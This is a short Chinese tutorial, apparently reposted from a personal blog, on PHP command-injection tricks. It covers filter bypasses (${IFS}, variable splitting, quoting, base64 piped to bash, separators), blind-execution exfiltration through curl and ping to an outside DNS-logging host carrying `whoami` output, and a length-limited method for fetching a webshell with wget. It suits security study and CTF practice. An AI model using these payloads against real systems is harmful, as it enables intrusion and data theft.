码迷,mamicode.com
首页 > Web开发 > 详细

浅析php命令执行

时间:2019-10-27 22:22:01      阅读:111      评论:0      收藏:0      [点我收藏+]

标签:html   翻页   more   图片   tac   字符串   字段   分隔符   lang   

总结一下自己在命令执行这一方面收获的一些小技巧

Linux读取文件的一些命令

cat  从第一行开始,显示文件的所有内容
tac  从第最后一行开始,显示文件的所有内容(正好与cat相反)
more 根据窗口大小,一页一页的实现文件内容
less 和more类似,但是优点是是可以往前翻页和搜索字符
head  只显示前几行
tail  只显示后几行
nl     类似于cat -n,显示时输出行号

linux下的一些绕过方式

  • 过滤了空格

可以使用${IFS}来进行绕过
echo${IFS}123456

读取文件的时候可以使用重定向符号

cat<>filename

cat<filename

  • 黑名单绕过

使用拼接法

a=l;b=s;$a$b 执行的就是ls

利用base64编码
echo "d2hvYW1pCg=="|base64 -d 整体用反单引号包一下,我这边是markdown语法。

echo "d2hvYW1pCg=="|base64 -d|bash

使用单双引号

ca''t flag
ca""t flag
ca''t fl''ag

使用反斜线

ca\t fl\ag

Linux自带的一些字符

绕过过滤分隔符号

Linux自带的三种分隔符号
; || &&

${PS2}代表">"
${PS4}代表"+"
${IFS}代表字段分隔符
${9}代表空字符串

可以使用

%0a %0d ; ${IFS} &绕过

命令终止符号

%00 %20#

无回显命令执行

  • 反弹shell(nc啦,msf啦这里面不在赘述)

  • dns管道解析

http://ceye.io/records/http注册一个账号就行了,看一下自己的dns

技术图片?

执行
curl http://ip.port.b182oj.ceye.io/`whoami`
ping `whoami`.ip.port.b182oj.ceye.io

curl `whoami`.i96tvv.ceye.io

在看一下dns的解析记录

技术图片?

限制了长度

1>wget1>域名.1>com1>-O1>she1>ll.p1>p
ls>a
sh a

利用文件名进行命令执行6

文章

浅析php命令执行

标签:html   翻页   more   图片   tac   字符串   字段   分隔符   lang   

原文地址:https://www.cnblogs.com/Mikasa-Ackerman/p/qian-xiphp-ming-ling-zhi-xing.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!